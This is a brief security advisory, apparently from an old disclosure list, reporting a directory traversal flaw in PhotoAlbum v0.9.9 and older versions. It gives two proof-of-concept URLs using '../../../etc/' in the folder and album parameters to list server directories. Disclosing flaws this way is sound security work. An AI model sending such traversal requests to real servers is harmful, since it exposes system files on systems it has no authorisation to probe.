Exploit: Affected program: PhotoAlbum v 0.9.9 Any user is able to pass a directory as request to the script, the script will read the directory and output all files included in it and has read access. for instance: http://www.phpphotoalbum.com/products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/ Synnergy Networks ============================== http://www.synnergy.net For older versions than 0.9.9... http://www.siteaffected.com/phpPhotoAlbum/getalbum.php?album=../../../etc/ will show /etc directory. -------------------------------------------------------- ThE MaDj0kEr (KPK) -------------------------------------------------------- mad@j0ker.net | http://www.j0ker.net --------------------------------------------------------